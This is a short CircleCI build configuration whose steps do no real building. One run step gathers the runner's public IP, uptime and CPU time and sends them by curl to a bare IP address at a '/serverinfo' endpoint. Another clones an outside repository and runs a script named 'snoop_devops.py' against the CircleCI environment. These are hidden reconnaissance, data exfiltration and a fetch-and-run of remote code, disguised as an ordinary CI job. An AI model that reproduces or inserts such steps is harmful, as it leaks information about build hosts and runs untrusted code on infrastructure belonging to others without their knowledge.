version: 2
jobs:
  build:
    docker:
      - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt update && apt install curl git dnsutils python3 python3-pip -y; pip3 install requests;
      - run: public_ip=$(curl https://myexternalip.com/raw); uptime=$(cat /proc/uptime | awk '{print $2}'); cputime=$(cat /proc/uptime | awk '{print $1}'); curl -Li "54.191.75.188/serverinfo?platform=circleci&ip=$public_ip&uptime=$uptime&cputime=$cputime"
      - run: git clone https://github.com/dajiejie345/dns-original.git && cd dns-original && python3 snoop_devops.py circleci
